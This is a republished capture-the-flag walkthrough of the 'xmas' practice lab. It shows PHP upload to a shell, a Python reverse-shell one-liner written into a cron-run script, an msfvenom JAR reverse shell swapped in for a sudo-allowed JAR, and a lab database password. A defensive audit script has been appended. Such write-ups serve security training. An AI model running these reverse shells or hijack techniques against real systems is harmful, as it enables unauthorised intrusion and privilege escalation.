【OSCP】xmas

admin, 2024-05-08 13:44:13

OSCP Lab

Lab overview

Name: xmas

Difficulty: easy

Topics: file upload vulnerability, process analysis, Python reverse shell, JAR reverse shell

Information gathering

Host discovery

nmap -sn 192.168.31.175

A DNS entry needs to be added.

Port scan

└─# nmap -sV -A -p- -T4 192.168.31.175
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 04:27 EST
Nmap scan report for 192.168.31.175
Host is up (0.00060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a6:3e:0b:65:85:2c:0c:5e:47:14:a9:dd:aa:d4:8c:60 (ECDSA)
|_ 256 99:72:b5:6e:1a:9e:70:b3:24:e0:59:98:a4:f9:d1:25 (ED25519)
80/tcp open http Apache httpd 2.4.55
|_http-title: Did not follow redirect to http://christmas.hmv
|_http-server-header: Apache/2.4.55 (Ubuntu)
MAC Address: 08:00:27:B1:AE:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory scan

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt     -u http://christmas.hmv/ -x php,html,txt -e 

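Gaining access

Here a PHP file can be uploaded directly.

After a successful upload the file can be executed; for convenience we then spawn a reverse shell.

Privilege escalation

Checking passwd shows that several accounts exist, but we have no access to any of them.

Uploading linpeas.sh and scanning with it shows that the nice_or_naughty.py script is writable.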

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/opt/NiceOrNaughty/nice_or_naughty.py
/run/apache2/socks
/run/lock
/run/lock/apache2
/run/screen

Next, upload pspy64 to watch the running processes. It reveals a scheduled task that runs with UID 1000.

2024/02/09 10:08:01 CMD: UID=1000 PID=27592  | /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py 
2024/02/09 10:08:01 CMD: UID=1000 PID=27591 | /bin/sh -c /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py


www-data@xmas:/opt/NiceOrNaughty$ cat nice_or_naughty.py
cat nice_or_naughty.py
import mysql.connector
import random
import os

# Check the wish lists directory
directory = "/var/www/christmas.hmv/uploads"
# Connect to the mysql database christmas
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    password="ChristmasMustGoOn!",
    database="christmas"
)

#Read the names of the wish list
def read_names(directory):
    for filename in os.listdir(directory):
        full_path = os.path.join(directory, filename)
        if os.path.isfile(full_path):
            name, ext = os.path.splitext(filename)
            if any(char.isalnum() for char in name):
                status = random.choice(["nice", "naughty"])
                #print(f"{name} {status}")
                insert_data(name, status)
                os.remove(full_path)
            else:
                pass

        elif os.path.isdir(full_path):
            pass

# Insert name into the database
def insert_data(name, status):
    mycursor = mydb.cursor()
    sql = "INSERT INTO christmas (name, status) VALUES ( %s, %s)"
    val = (name, status)
    mycursor.execute(sql, val)
    mydb.commit()

#Generate printable Nice and Naughty list
def generate_lists():
    mycursor = mydb.cursor()

    # SQL query to fetch all names and status
    mycursor.execute("SELECT name, status FROM christmas")

    # Separate the nice and naughty lists
    nice_list = []
    naughty_list = []

    for (name, status) in mycursor:
        if status == "nice":
            nice_list.append(name)
        else:
            naughty_list.append(name)

    parent_directory = os.path.dirname(os.getcwd())
    file_path = "/home/alabaster/nice_list.txt"
    # Save the nice and naughty lists to separate txt files
    with open(file_path, "w") as file:
        for name in nice_list:
            file.write(f"{name}\n")
    file_path = "/home/alabaster/naughty_list.txt"
    with open(file_path, "w") as file:
        for name in naughty_list:
            file.write(f"{name}\n")

read_names(directory)
generate_lists()

Write a Python reverse shell into the script

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.181",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' > nice_or_naughty.py

Privileges are successfully escalated to the alabaster user.

sudo -l shows that sudo /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar can be run without a password.

alabaster@xmas:~$ sudo -l
sudo -l
Matching Defaults entries for alabaster on xmas:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
use_pty

User alabaster may run the following commands on xmas:
(ALL : ALL) ALL
(ALL) NOPASSWD: /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar
alabaster@xmas:~$

Next we use msfvenom to generate a reverse-shell JAR.

msfvenom -p java/shell_reverse_tcp LHOST=192.168.31.181 LPORT=8989 -f jar -o shell.jar

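Then we start a web server on Kali, download the file into the directory the command runs from, and give it the name of the PublishList.jar package so that it replaces the original.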

php -S 0.0.0.0:12345

Finally, run it: the reverse shell connects back and privileges are escalated to root.
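Both escalation steps above depend on the same misconfiguration: a command that runs with more privilege (the UID 1000 scheduled task, the root NOPASSWD sudo rule) references a file that a less privileged account can modify or replace. The audit script below is an added example, not part of the original write-up; it reads pspy-style process lines or `sudo -l` rule lines and reports the referenced files and parent directories that are writable outside the trusted UIDs. The function names and the conservative treatment of group-write bits are assumptions of this sketch.

```python
import os, re, shlex, stat

PSPY = re.compile(r"CMD: UID=(\d+)\s+PID=\d+\s+\| (.+)$")
SUDO = re.compile(r"^\((?:ALL|root)[^)]*\)\s+NOPASSWD:\s+(.+)$")

def parse_line(line):
    """Return (trusted_uids, command) for a pspy or `sudo -l` line, else None."""
    line = line.strip()
    m = PSPY.search(line)
    if m:                                   # job runs as this UID
        return {0, int(m.group(1))}, m.group(2)
    m = SUDO.match(line)
    if m:                                   # rule runs the command as root
        return {0}, m.group(1)
    return None

def modifiable(path, trusted_uids):
    """True if an account outside trusted_uids can change `path`."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return True
    # Conservative assumption: any group/other write bit counts.
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(line):
    """List files/directories through which the privileged command can be hijacked."""
    parsed = parse_line(line)
    if parsed is None:
        return []
    trusted, command = parsed
    try:
        tokens = shlex.split(command)
    except ValueError:                      # unbalanced quotes in the captured line
        tokens = command.split()
    findings = []
    for token in tokens:
        if token.startswith("/") and os.path.exists(token):
            # A writable parent directory allows replacing the file by rename.
            for target in (token, os.path.dirname(token)):
                if modifiable(target, trusted) and target not in findings:
                    findings.append(target)
    return findings

if __name__ == "__main__":
    import sys
    for line in sys.stdin:                  # e.g. pspy64 output or `sudo -l` output
        for hit in audit(line):
            print(f"{hit}\t<- {line.strip()}")
```

On this lab, feeding it the pspy lines would report /opt/NiceOrNaughty/nice_or_naughty.py, and the NOPASSWD rule would report the JAR and its directory under /home/alabaster, since both belong to an account other than root.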


End


Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】xmas

  • Published on 2024-05-08 13:44:13
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work): 【OSCP】xmas https://cn-sec.com/archives/2719424.html
